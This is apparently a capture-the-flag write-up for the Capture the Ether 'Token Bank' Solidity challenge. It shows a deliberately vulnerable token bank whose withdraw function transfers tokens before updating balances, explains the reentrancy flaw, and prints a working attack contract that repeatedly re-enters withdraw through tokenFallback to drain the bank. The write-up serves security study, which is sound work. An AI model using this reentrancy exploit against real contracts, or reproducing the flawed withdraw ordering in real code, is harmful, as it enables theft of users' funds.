Account Takeover

topic

pragma solidity ^0.4.21;

interface ITokenReceiver {
    function tokenFallback(address from, uint256 value, bytes data) external;
}

contract SimpleERC223Token {
    // Track how many tokens are owned by each address.
    mapping (address => uint256) public balanceOf;

    string public name = "Simple ERC223 Token";
    string public symbol = "SET";
    uint8 public decimals = 18;

    uint256 public totalSupply = 1000000 * (uint256(10) ** decimals);

    event Transfer(address indexed from, address indexed to, uint256 value);

    function SimpleERC223Token() public {
        balanceOf[msg.sender] = totalSupply;
        emit Transfer(address(0), msg.sender, totalSupply);
    }

    function isContract(address _addr) private view returns (bool is_contract) {
        uint length;
        assembly {
            //retrieve the size of the code on target address, this needs assembly
            length := extcodesize(_addr)
        }
        return length > 0;
    }

    function transfer(address to, uint256 value) public returns (bool success) {
        bytes memory empty;
        return transfer(to, value, empty);
    }

    function transfer(address to, uint256 value, bytes data) public returns (bool) {
        require(balanceOf[msg.sender] >= value);

        balanceOf[msg.sender] -= value;
        balanceOf[to] += value;
        emit Transfer(msg.sender, to, value);

        if (isContract(to)) {
            ITokenReceiver(to).tokenFallback(msg.sender, value, data);
        }
        return true;
    }

    event Approval(address indexed owner, address indexed spender, uint256 value);

    mapping(address => mapping(address => uint256)) public allowance;

    function approve(address spender, uint256 value)
        public
        returns (bool success)
    {
        allowance[msg.sender][spender] = value;
        emit Approval(msg.sender, spender, value);
        return true;
    }

    function transferFrom(address from, address to, uint256 value)
        public
        returns (bool success)
    {
        require(value <= balanceOf[from]);
        require(value <= allowance[from][msg.sender]);

        balanceOf[from] -= value;
        balanceOf[to] += value;
        allowance[from][msg.sender] -= value;
        emit Transfer(from, to, value);
        return true;
    }
}

contract TokenBankChallenge {
    SimpleERC223Token public token;
    mapping(address => uint256) public balanceOf;

    function TokenBankChallenge(address player) public {
        token = new SimpleERC223Token();

        // Divide up the 1,000,000 tokens, which are all initially assigned to
        // the token contract's creator (this contract).
        balanceOf[msg.sender] = 500000 * 10**18;  // half for me
        balanceOf[player] = 500000 * 10**18;      // half for you
    }

    function isComplete() public view returns (bool) {
        return token.balanceOf(this) == 0;
    }

    function tokenFallback(address from, uint256 value, bytes) public {
        require(msg.sender == address(token));
        require(balanceOf[from] + value >= balanceOf[from]);

        balanceOf[from] += value;
    }

    function withdraw(uint256 amount) public {
        require(balanceOf[msg.sender] >= amount);

        require(token.transfer(msg.sender, amount));
        balanceOf[msg.sender] -= amount;
    }
}

analyses

本题是有关ERC20的重入问题，可以看到如下有问题的代码：

先转钱，再修改变量

function withdraw(uint256 amount) public {
    require(balanceOf[msg.sender] >= amount);

    require(token.transfer(msg.sender, amount));
    balanceOf[msg.sender] -= amount;
}

一旦转钱，此ERC20的transfer()就会去执行外部合约实现的tokenFallback()方法，也就是模拟fallback()函数

function transfer(address to, uint256 value, bytes data) public returns (bool) {
    require(balanceOf[msg.sender] >= value);

    balanceOf[msg.sender] -= value;
    balanceOf[to] += value;
    emit Transfer(msg.sender, to, value);

    if (isContract(to)) {
        ITokenReceiver(to).tokenFallback(msg.sender, value, data);
    }
    return true;
}

情况很明了，就是写一个重入攻击的合约，实现恶意的tokenFallback()方法，不断重入地调用取钱函数

solution

pragma solidity ^0.4.21;

contract TokenBankSolver {
    ITokenBankChallenge public challenge;
    ISimpleERC223Token public token;
    uint256 public balance = 500000000000000000000000;

    function TokenBankSolver(address _addr,address _ISimpleERC223Token) public {
        challenge = ITokenBankChallenge(_addr);
        token = ISimpleERC223Token(_ISimpleERC223Token);
    }

    function attack() public returns(uint256) {
        token.transfer(challenge, balance);
        challenge.withdraw(balance);
    }

    function tokenFallback(address from, uint256 value, bytes data) public {
        token.balanceOf(from); 
        require(msg.sender == address(token));
        uint256 challengeLeftBalance = token.balanceOf(address(challenge));
        bool keepRecursing = challengeLeftBalance > 0;
        if (keepRecursing) {
        	uint256 v = value < challengeLeftBalance? value: challengeLeftBalance;
        	challenge.withdraw(v);
        }
    }

    function isComplete() public view returns(bool) {
        return challenge.isComplete();
    }
}

2023-06-23 20:36:14 # 01.Capturetheether CTF